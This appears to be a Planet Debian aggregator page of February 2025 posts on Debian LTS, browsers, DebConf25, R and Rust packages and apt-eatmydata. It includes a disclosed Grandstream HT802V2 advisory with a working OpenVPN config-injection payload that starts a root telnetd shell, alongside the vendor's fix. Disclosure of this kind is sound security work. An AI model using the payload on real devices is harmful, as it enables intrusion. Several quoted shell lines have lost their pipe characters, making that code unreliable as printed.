
14 February 2025

Jonathan Dowland: printables.com feed

I wanted to follow new content posted to Printables.com with a feed reader, but Printables.com doesn't provide one. Neither do the other obvious 3D model catalogues. So, I started building one. I have something that spits out an Atom feed and a couple of beta testers gave me some valuable feedback. I had planned to make it public, with the ultimate goal being to convince Printables.com to implement feeds themselves. Meanwhile, I stumbled across someone else who has done basically the same thing and published 3rd-party feeds for Printables.com. The format of their feeds is JSON Feed, which is new to me. FreshRSS and NetNewsWire seem happy with it. (I went with Atom.) I may still release my take, if I find time to make one improvement that my beta-testers suggested.
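For the curious, the core of such a generator is small: scrape the model listing, then emit Atom XML. Here is a minimal shell sketch of the output side only; the feed title, IDs and URLs are made up, and the scraping step is elided:
#!/bin/sh
# Emit a minimal Atom feed skeleton; a real generator would loop
# over scraped model data instead of one hard-coded entry.
now=$(date -u +%Y-%m-%dT%H:%M:%SZ)
cat <<EOF
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Printables: new models (unofficial)</title>
  <id>urn:example:printables-feed</id>
  <updated>$now</updated>
  <entry>
    <title>Example model</title>
    <id>urn:example:model-0000</id>
    <link href="https://www.printables.com/model/0000"/>
    <updated>$now</updated>
  </entry>
</feed>
EOF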

Freexian Collaborators: Monthly report about Debian Long Term Support, January 2025 (by Roberto C. Sánchez)

Like each month, have a look at the work funded by Freexian's Debian LTS offering.

Debian LTS contributors

In January, 20 contributors have been paid to work on Debian LTS; their reports are available:
  • Abhijith PA did 8.0h (out of 14.0h assigned), thus carrying over 6.0h to the next month.
  • Adrian Bunk did 36.5h (out of 47.75h assigned and 52.25h from previous period), thus carrying over 63.5h to the next month.
  • Andrej Shadura did 11.0h (out of 11.0h assigned and 4.0h from previous period), thus carrying over 4.0h to the next month.
  • Arturo Borrero Gonzalez did 9.0h (out of 10.0h assigned), thus carrying over 1.0h to the next month.
  • Bastien Roucariès did 22.0h (out of 22.0h assigned).
  • Ben Hutchings did 8.0h (out of 21.0h assigned and 3.0h from previous period), thus carrying over 16.0h to the next month.
  • Chris Lamb did 18.0h (out of 18.0h assigned).
  • Daniel Leidert did 20.0h (out of 23.0h assigned and 3.0h from previous period), thus carrying over 6.0h to the next month.
  • Emilio Pozuelo Monfort did 34.0h (out of 7.0h assigned and 27.75h from previous period), thus carrying over 0.75h to the next month.
  • Guilhem Moulin did 3.25h (out of 20.0h assigned), thus carrying over 16.75h to the next month.
  • Jochen Sprickerhof did 23.0h (out of 15.0h assigned and 8.0h from previous period).
  • Lee Garrett did 15.75h (out of 8.5h assigned and 51.5h from previous period), thus carrying over 44.25h to the next month.
  • Lucas Kanashiro did 8.0h (out of 32.0h assigned and 32.0h from previous period), thus carrying over 56.0h to the next month.
  • Markus Koschany did 40.0h (out of 40.0h assigned).
  • Roberto C. Sánchez did 14.75h (out of 13.5h assigned and 10.5h from previous period), thus carrying over 9.25h to the next month.
  • Santiago Ruano Rincón did 21.75h (out of 18.75h assigned and 6.25h from previous period), thus carrying over 3.25h to the next month.
  • Sean Whitton did 8.5h (out of 8.5h assigned).
  • Sylvain Beucler did 10.5h (out of 0.0h assigned and 49.5h from previous period), thus carrying over 39.0h to the next month.
  • Thorsten Alteholz did 11.0h (out of 11.0h assigned).
  • Tobias Frost did 12.0h (out of 12.0h assigned).

Evolution of the situation

In January, we released 33 DLAs. There were numerous security and non-security updates to Debian 11 (codename "bullseye") during January.
  • Notable security updates:
    • rsync, prepared by Thorsten Alteholz, fixed several CVEs (including information leak and path traversal vulnerabilities)
    • tomcat9, prepared by Markus Koschany, fixed several CVEs (including denial of service and information disclosure vulnerabilities)
    • ruby2.7, prepared by Bastien Roucariès, fixed several CVEs (including denial of service vulnerabilities)
    • tiff, prepared by Adrian Bunk, fixed several CVEs (including NULL pointer dereference, buffer overflow, use-after-free, and segfault vulnerabilities)
  • Notable non-security updates:
    • linux-6.1, prepared by Ben Hutchings, has been packaged for bullseye (this was done specifically to provide a supported upgrade path for systems that currently use kernel packages from the bullseye-backports suite)
    • debian-security-support, prepared by Santiago Ruano Rincón, which formalized the EOL of intel-mediasdk and node-matrix-js-sdk
In addition to the security and non-security updates targeting "bullseye", various LTS contributors have prepared uploads targeting Debian 12 (codename "bookworm") with fixes for a variety of vulnerabilities. Abhijith PA prepared an upload of puma; Bastien Roucariès prepared an upload of node-postcss with fixes for data processing and denial of service vulnerabilities; Daniel Leidert prepared updates for setuptools, python-asyncssh, and python-tornado; Lee Garrett prepared an upload of ansible-core; and Guilhem Moulin prepared updates for python-urllib3, sqlparse, and opensc. Santiago Ruano Rincón also worked on tracking and filing some issues about packages that need an update in recent releases to avoid regressions on upgrade. This relates to CVEs that were fixed in buster or bullseye, but remain open in bookworm. These updates, along with Santiago's work on identifying and tracking similar issues, underscore the LTS Team's commitment to ensuring that the work we do as part of LTS also benefits the current Debian stable release. LTS contributor Sean Whitton also prepared an upload of jinja2 and Santiago Ruano Rincón prepared an upload of openjpeg2 for Debian unstable (codename "sid"), as part of the LTS Team effort to assist with package uploads to unstable.

Thanks to our sponsors

Sponsors that joined recently are in bold.

13 February 2025

Russell Coker: Browser Choice

Browser Choice and Security Support

Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn't an option and Chromium still has some of the Google anti-features built in.

Firefox

So I tried to use Firefox for the things I do. One feature of Chrome-based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed because it was apparently being constantly attacked by malware [2]. There are addons to allow that, but I prefer to have a minimal number of addons and not have any that are just to replace deliberately broken settings in the browser. Also those addons can't set a file for the URL, so I could set up a web server for it, but it's annoying to have to set up a web server to work around a browser limitation. Another thing that annoyed me was YouTube videos opened in new tabs not starting to play when I change to the tab. There's a Firefox setting for allowing web sites to autoplay, but there doesn't seem to be a way to add sites to the list. Firefox is getting vertical tabs, which is a really nice feature for wide displays [3]. Firefox has a Mozilla service for syncing passwords etc. It is possible to run your own server for this, but the server is written in Rust, which is difficult to package and run [4]. There are Docker images for it, but I prefer to avoid Docker; generally I think that Docker is a sign of failure in software development. If you can't develop software that can be deployed without Docker then you aren't developing it well.

Chromium

The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it's not included in Debian. Some of the changes, like replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk, could be considered controversial. It definitely isn't a candidate to replace the current Chromium package in Debian, but might be a possibility to have as an extra browser.

What Next?

The Falkon browser that is part of the KDE project looks good, but QtWebEngine doesn't have security support in Debian. Would it be possible to provide security support for it? Ungoogled Chromium is available in Flatpak, so I'll test that out. But ideally it would be packaged for Debian. I'll try building a package of it and see how that goes. The Iridium Browser is another option [6]; it seems similar in design to Ungoogled-Chromium but by different people.

Bits from Debian: DebConf25 Logo Contest Results

Last November, the DebConf25 Team asked the community to help design the logo for the 25th Debian Developers' Conference and the results are in! The logo contest received 23 submissions and we thank all the 295 people who took the time to participate in the survey. There were several amazing proposals, so choosing was not easy. We are pleased to announce that the winner of the logo survey is 'Tower with red Debian Swirl originating from blue water' (option L), by Juliana Camargo and licensed CC BY-SA 4.0. [DebConf25 Logo Contest Winner] Juliana also shared with us a bit of her motivation, creative process and inspiration when designing her logo:
The idea for this logo came from the city's landscape, the place where the medieval tower looks over the river that meets the sea, almost like guarding it. The Debian red swirl comes out of the blue water splash as a continuous stroke, and they are also the French flag colours. I tried to combine elements from the city when I was sketching in the notebook, which is an important step for me as I feel that ideas flow much more easily, but the swirl + water with the tower was the most refreshing combination, so I jumped to the computer to design it properly. The water bit was the most difficult element, and I used the Debian swirl as a base for it, so both would look consistent. The city name font is a modern calligraphy style and the overall composition is not symmetric but balanced with the different elements. I am glad that the Debian community felt represented with this logo idea!
Congratulations, Juliana, and thank you very much for your contribution to Debian! The DebConf25 Team would like to take this opportunity to remind you that DebConf, the annual international Debian Developers' Conference, needs your help. If you want to help with the DebConf 25 organization, don't hesitate to reach out to us via the #debconf-team channel on OFTC. Furthermore, we are always looking for sponsors. DebConf is run on a non-profit basis, and all financial contributions allow us to bring together a large number of contributors from all over the globe to work collectively on Debian. Detailed information about the sponsorship opportunities is available on the DebConf 25 website. See you in Brest!

12 February 2025

Dirk Eddelbuettel: RcppUUID 1.2.0 on CRAN: Adding Clock-based UUIDs

The RcppUUID package on CRAN has been providing UUIDs (based on the underlying Boost library) for several years. Written by Artem Klemsov and maintained in this gitlab repo, the package is a very nice example of a clean and straightforward library binding. As it had dropped off CRAN over a relatively minor issue, I decided to adopt it, with the previous 1.1.2 release made quite recently. This release adds new high-resolution clock-based UUIDs according to the v7 spec. Internally, 100ns increments are represented. The resulting UUIDs are both unique and sortable. I added this recent example to the README.md which illustrates both the implicit ordering and uniqueness. The unit tests check this with a much larger N.
> RcppUUID::uuid_generate_time(5)
[1] "0194d8fa-7add-735c-805b-6bbf22b78b9e" "0194d8fa-7add-735e-8012-3e0e53895b19"
[3] "0194d8fa-7add-735e-81af-bc67bb435ade" "0194d8fa-7add-735e-82b1-405bf57963ad"
[5] "0194d8fa-7add-735f-801e-efe57078b2e7"
>
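Per RFC 9562, the first 48 bits of a version 7 UUID encode the Unix timestamp in milliseconds, which is what makes lexical order chronological. As a quick illustration, here is a bash sketch of mine (not part of the package, and assuming GNU date) that recovers the timestamp from one of the identifiers above:
# The first 12 hex digits of a v7 UUID are milliseconds since the epoch.
uuid=0194d8fa-7add-735c-805b-6bbf22b78b9e
ms=$((16#$(printf '%s' "$uuid" | tr -d '-' | cut -c1-12)))
date -u -d "@$((ms / 1000))"   # prints a timestamp in February 2025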
While one can revert from the UUID object to the clock object, I am not aware of a text parser, so there is currently no inverse function (as ulid offers) for the character representation. The NEWS entries for the two releases follow.

Changes in version 1.2.0 (2025-02-12)
  • Time-based UUIDs, i.e. version 7, can now be generated (requiring Boost 1.86 or newer as in the current BH package)

Changes in version 1.1.2 (2025-01-31)
  • New maintainer to resurrect package on CRAN

Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppUUID page, or the github repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5, and while playing around with the VPN settings I realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)"   sed 's/;/\n/g' >> $ CONF_FILE 
After the fix it does
echo "$(nvram get 8460)"   sed -e 's/;/\n/g'   sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE 
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this will still be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
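To see why the quoted form slips through, the relevant sed rule can be replayed by hand. A minimal sketch, using just the up rule copied from the vulnerable init script above:
# Feed one legitimate and one quoted line through the filter:
sed -e 's/;/\n/g' -e '/^[ ]*up /d' <<'EOF'
up /etc/openvpn/openvpn.up
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
EOF
# Only the quoted line survives: /^[ ]*up / requires a bare "up"
# followed by a space, which the leading double quote defeats.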
Affected devices

Fix

After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)"   sed -e 's/;/\n/g' \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE 
So far I was unable to inject any further commands in this block.

Timeline

11 February 2025

Ian Jackson: derive-deftly 1.0.0 - Rust derive macros, the easy way

derive-deftly 1.0 is released. derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too! Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules; and its convenience and simplicity, compared to proc macros. Programmers coming to Rust from scripting languages will appreciate derive-deftly's convenient automatic code generation, which works as a kind of compile-time introspection.

Rust's two main macro systems

I'm often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness. Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use. (Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs; and multiple module inclusion via #[path=]. These are beyond the scope of this blog post.)

macro_rules!

macro_rules!, aka "pattern macros", "declarative macros", or sometimes "macros by example", are the simpler kind of Rust macro. They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)] macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward: macro_rules's pattern language doesn't have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there's a horrible technique as a workaround.) And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! { }. This makes it hard to apply more than one macro to the same struct, and produces rightward drift. Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside. macro_rules also has various other weird deficiencies too specific to list here. Overall, compared to (say) the C preprocessor, it's great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.

proc macros

Rust's second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro's implementation is Rust code, which takes the macro's input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program. This approach is more similar to Common Lisp's macros than to most other programming languages' macro systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.
This is used very heavily in the standard library for basic features like #[derive(Debug)] and Clone, and for important libraries like serde and strum. But, it is a complete pain in the backside to write and maintain a proc_macro. The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust's highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code. There are build/execution environment problems. The proc_macro code can't live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can't test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust.

derive-deftly to the rescue

derive-deftly lets you write a #[derive(...)] macro, driven by a data structure, without wading into any of that stuff. Your macro definition is a template in a simple syntax, with predefined $-substitutions for the various parts of the input data structure.

Example

Here's a real-world example from a personal project:
define_derive_deftly! {
    export UpdateWorkerReport:
    impl $ttype {
        pub fn update_worker_report(&self, wr: &mut WorkerReport) {
            $(
                ${when fmeta(worker_report)}
                wr.$fname = Some(self.$fname.clone()).into();
            )
        }
    }
}
#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow {
    ...
    #[deftly(worker_report)]
    pub status: JobStatus,
    pub processing: NoneIsEmpty<ProcessingInfo>,
    #[deftly(worker_report)]
    pub info: String,
    pub duplicate_of: Option<JobId>,
}
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:
    pub fn update_worker_report(&self, wr: &mut WorkerReport) {
        wr.status = Some(self.status.clone()).into();
        wr.info = Some(self.status.clone()).into();
    }
Spot the mistake? We copy status to info. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible.

Special-purpose derive macros are now worthwhile!

Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)] macros. The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly. Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.) In my most recent personal Rust project, I have 22 bespoke derive macros, done with derive-deftly, and 19 macro_rules macros. derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.

Stability without stagnation

derive-deftly is already highly capable, and can solve many advanced problems. It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide. But declaring it 1.0 doesn't mean that it won't improve further. Our ticket tracker has a laundry list of possible features. We'll sometimes be cautious about committing to these, so we've added a beta feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.


Bálint Réczey: Supercharge Your Installs with apt-eatmydata: Because Who Needs Crash Safety Anyway?

[APT eatmydata super cow powers]
Tired of waiting for apt to finish installing packages? Wish there were a way to make your installations blazingly fast without caring about minor things like, oh, data integrity? Well, today is your lucky day!
I'm thrilled to introduce apt-eatmydata, now available for Debian and all supported Ubuntu releases!

What Is apt-eatmydata?

If you've ever used libeatmydata, you know it's a nifty little hack that disables fsync() and friends, making package installations way faster by skipping unnecessary disk writes. Normally, you'd have to remember to wrap apt commands manually, like this:
eatmydata apt install texlive-full
But who has time for that? apt-eatmydata takes care of this automagically by integrating eatmydata seamlessly into apt itself! That means every package install is now turbocharged, with no extra typing required.
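For a feel of what skipping synchronization buys, here is a rough benchmark sketch of mine (it assumes the eatmydata package is installed, and that libeatmydata neuters fsync() and strips O_SYNC from open(), as its documentation describes):
# Synchronous writes, then the same run with fsync/O_SYNC disabled;
# the second invocation should finish dramatically faster.
time dd if=/dev/zero of=/tmp/sync-test bs=4k count=1000 oflag=sync
time eatmydata dd if=/dev/zero of=/tmp/sync-test bs=4k count=1000 oflag=sync
rm -f /tmp/sync-test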

How to Get It

Debian

If you're on Debian unstable/testing (or possibly soon in stable-backports), you can install it directly with:
sudo apt install apt-eatmydata

Ubuntu

Ubuntu users already enjoy faster package installation thanks to zstd-compressed packages, and to switch to an even higher gear I've backported apt-eatmydata to all supported Ubuntu releases. Just add this PPA and install:
sudo add-apt-repository ppa:firebuild/apt-eatmydata
sudo apt install apt-eatmydata
And boom! Your apt install times are getting a serious upgrade. Let's run some tests:
# pre-download package to measure only the installation
$ sudo apt install -d linux-headers-6.8.0-53-lowlatency
...
# installation time is 9.35s without apt-eatmydata:
$ sudo time apt install linux-headers-6.8.0-53-lowlatency
...
2.30user 2.12system 0:09.35elapsed 47%CPU (0avgtext+0avgdata 174680maxresident)k
32inputs+1495216outputs (0major+196945minor)pagefaults 0swaps
$ sudo apt install apt-eatmydata
...
$ sudo apt purge linux-headers-6.8.0-53-lowlatency
# installation time is 3.17s with apt-eatmydata:
$ sudo time eatmydata apt install linux-headers-6.8.0-53-lowlatency
2.30user 0.88system 0:03.17elapsed 100%CPU (0avgtext+0avgdata 174692maxresident)k
0inputs+205664outputs (0major+198099minor)pagefaults 0swaps
apt-eatmydata just made installing Linux headers 3x faster!

But Wait, There's More!

If you're automating CI builds, there's even a GitHub Action to make your workflows faster, essentially doing what apt-eatmydata does, just setting it up in less than a second! Check it out here:
GitHub Marketplace: apt-eatmydata

Should You Use It?

Warning: apt-eatmydata is not for all production environments. If your system crashes mid-install, you might end up with a broken package database. But for throwaway VMs, containers, and CI pipelines? It's an absolute game-changer. I use it on my laptop, too. So go forth and install recklessly fast! If you run into any issues, feel free to file a bug or drop a comment. Happy hacking! (To accelerate your CI pipeline or local builds, check out Firebuild, which speeds up builds, too!)

Freexian Collaborators: Debian Contributions: Python 3.13 as the default Python 3 version, Fixing qtpaths6 for cross compilation, sbuild support for Salsa CI, Rails 7 transition, DebConf preparations and more! (by Anupa Ann Joseph)

Debian Contributions: 2025-01

Contributing to Debian is part of Freexian's mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Python 3.13 is now the default Python 3 version in Debian, by Stefano Rivera and Colin Watson

The Python 3.13 as default transition has now completed. The next step is to remove Python 3.12 from the archive, which should be very straightforward; it just requires rebuilding C extension packages in no particular order. Stefano fixed some miscellaneous bugs blocking the completion of the 3.13 as default transition.

Fixing qtpaths6 for cross compilation, by Helmut Grohne

While Qt5 used to use qmake to query installation properties, Qt6 is moving more and more to CMake and, to ease that transition, it relies more on qtpaths. Since this tool is not naturally aware of the architecture it is called for, it tends to produce results for the build architecture. Therefore, more than 100 packages were picking up a multiarch directory for the build architecture during cross builds. In collaboration with the Qt/KDE team and Sandro Knauß in particular (none affiliated with Freexian), we added an architecture-specific wrapper script in the same way qmake has one for Qt5 and Qt6 already. The relevant CMake module has been updated to prefer the triplet-prefixed wrapper. As a result, most of the KDE packages now cross build on unstable, ready in time for the trixie release.

/usr-move, by Helmut Grohne

In December, Emil Södergren reported that live-build was not working for him and, in January, Colin Watson reported that the proposed mitigation for debian-installer-utils would practically fail. Both failures were to be attributed to a wrong understanding of implementation-defined behavior in dpkg-divert. As a result, all M18 mitigations had to be reviewed and many of them replaced. Many have been uploaded already and all instances have received updated patches. Even though dumat has been in operation for more than a year, it gained recent changes. For one thing, analysis of architectures other than amd64 was requested. Chris Hofstaedtler (not affiliated with Freexian) kindly provided computing resources for repeatedly running it on the larger set. Doing so revealed various cross-architecture undeclared file conflicts in gcc, glibc, and binutils-z80, but it also revealed a previously unknown /usr-move issue in rpi.rpi-common. On top of that, dumat produced false positive diagnostics and wrongly associated Debian bugs in some cases, both of which have now been fixed. As a result, a supposedly fixed python3-sepolicy issue had to be reopened.

rebootstrap, by Helmut Grohne

As much as we think of our base system as stable, it is changing a lot, and the architecture cross bootstrap tooling is very sensitive to such changes, requiring permanent maintenance. A problem that recently surfaced was that building a binutils cross toolchain would result in a binutils-for-host package that would not be practically installable, as it would depend on a binutils-common package that was not built. This turned into an examination of binutils-common and noticing that it actually differed across architectures even though it should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut provided a patch to move gprofng bits out of binutils-common. Independently, Matthias Klose (not affiliated with Freexian) split out binutils-gold into a separate source package. As a result, binutils-common is now equal across architectures and can be marked Multi-Arch: foreign, resolving the initial problem.

Salsa CI, by Santiago Ruano Rincón

Santiago continued the work on sbuild support for Salsa CI that was mentioned in the previous month's report. The !568 merge request that created the new build image was merged, making it easier to test !569 with external projects. Santiago used a fork of the debusine repo to try the draft !569, and some issues were spotted, part of them fixed. This is the last debusine pipeline run with the current !569: https://salsa.debian.org/santiago/debusine/-/pipelines/794233. One of the last improvements relates to how to enable projects to customize the pipeline, in a way equivalent to what they currently do in the extract-source and build jobs. While this is work-in-progress, the results are rather promising. Next steps include deciding on introducing schroot support for bookworm, bookworm-security, and older releases, as is done on the official Debian buildds.

DebConf preparations, by Stefano Rivera and Santiago Ruano Rincón

DebConf will be happening in Brest, France, in July. Santiago continued the DebConf 25 organization work, looking for catering providers. Both Stefano and Santiago have been reaching out to some potential sponsors. DebConf depends on sponsors to cover the organization cost; if your company depends on Debian, please consider sponsoring DebConf. Stefano has been winding up some of the finances from previous DebConfs, finalizing reimbursements to team members from DebConf 23 and handling some outstanding issues from DebConf 24. Stefano and the rest of the DebConf committee have been reviewing bids for DebConf 26, to select the next venue.

Ruby 3.3 is now the default Ruby interpreter, by Lucas Kanashiro

Ruby 3.3 is about to become the default Ruby interpreter for Trixie. Many bugs were fixed by Lucas and the Debian Ruby team during the sprint held in Paris during Jan 27-31. The next step is to remove support for Ruby 3.1, which is the alternative Ruby interpreter for now. Thanks to the Debian Release team for all the support, especially Emilio Pozuelo Monfort.

Rails 7 transition, by Lucas Kanashiro

Rails 6 has been shipped by Debian since bullseye, and, as with any web framework, many issues (especially security-related ones) have been encountered, making it harder and harder to maintain. With that in mind, during the Debian Ruby team sprint last month, the transition to Rack 3 (an important dependency of Rails containing many breaking changes) was started in Debian unstable and is ongoing. Once it is done, the Rails 7 transition will take place, and Rails 7 should be shipped in Debian Trixie.

Miscellaneous contributions
  • Stefano improved a poor ImportError for users of the turtle module on Python 3 who haven't installed the python3-tk package.
  • Stefano updated several packages to new upstream releases.
  • Stefano added the Python extension to the re2 package, allowing for the use of the Google RE2 regular expression library as a direct replacement for the standard library re module.
  • Stefano started provisioning a new physical server for the debian.social infrastructure.
  • Carles improved simplemonitor (documentation on systemd integration, worked with upstream for fixing a bug).
  • Carles upgraded packages to new upstream versions: python-ring-doorbell and python-asyncclick.
  • Carles did po-debconf translations to Catalan: reviewed 44 packages and submitted translations to 90 packages (via salsa merge requests or bugtracker bugs).
  • Carles maintained po-debconf-manager with small fixes.
  • Raphaël worked on some outstanding DEP-14 merge requests and participated in the associated discussion. The discussions have been more contentious than anticipated, somewhat exacerbated by Otto's desire to conclude fast while the required tool support is not yet there.
  • Raphaël, with the help of Philipp Kern from the DSA team, upgraded tracker.debian.org to use Django 4.2 (from bookworm-backports), which in turn enabled him to configure authentication via salsa.debian.org. It's now possible to log in to tracker.debian.org with your salsa credentials!
  • Raphaël updated zim, a nice desktop wiki that is very handy for organizing your day-to-day digital life, to the latest upstream version (0.76).
  • Helmut sent patches for 10 cross build failures.
  • Helmut continued working on a tool for memory-based concurrency limit of builds.
  • Helmut NMUed libtool, opensysusers and virtualbox.
  • Enrico tried to support Helmut in working out tricky usrmerge situations.
  • Thorsten Alteholz uploaded a new upstream version of brlaser.
  • Colin Watson upgraded 33 Python packages to new upstream versions, including fixes for CVE-2024-42353, CVE-2024-47532, and CVE-2025-22153.
  • Emilio Pozuelo managed various transitions, and fixed various RC bugs (telepathy-glib, xorg, xserver-xorg-video-vesa, apitrace, mesa).
  • Anupa attended the monthly team meeting for Debian publicity team and shared the social media stats.
  • Anupa assisted Jean-Pierre Giraud in the point release announcement for Debian 12.9 and published the Micronews.
  • Anupa took part in multiple Debian publicity team discussions regarding our presence in social media platforms.

10 February 2025

Petter Reinholdtsen: Some of my 2024 free software activities

It is a while since I posted a summary of the free software and open culture activities and projects I have worked on. Here is a quick summary of the major ones from last year. I guess the biggest project of the year has been migrating orphaned packages in Debian without a version control system to have a git repository on salsa.debian.org. When I started in April, around 450 orphaned packages needed git. I've since migrated around 250 of the packages to a salsa git repository, and around 40 packages were left when I took a break. Not sure who did the approximately 160 conversions I was not involved in, but I am very glad I got some help on the project. I stopped partly because some of the remaining packages needed more disk space to build than I have available on my development machine, and partly because some had a strange build setup I could not figure out. I had a time budget of 20 minutes per package; if the package proved problematic and likely to take longer, I moved to another package. Might continue later, if I manage to free up some disk space. Another rather big project was the translation to Norwegian Bokmål and publishing of the first book ever published by a Sámi woman, the Møter vi liv eller død? book by Elsa Laula, with a PD0 and CC-BY license. I released it during the summer, and to my surprise it has already sold several copies. As I suck at marketing, I did not expect to sell any. A smaller, but more long term project (for more than 10 years now), and related to orphaned packages in Debian, is my project to ensure a simple way to install hardware related packages in Debian when the relevant hardware is present in a machine. It made a 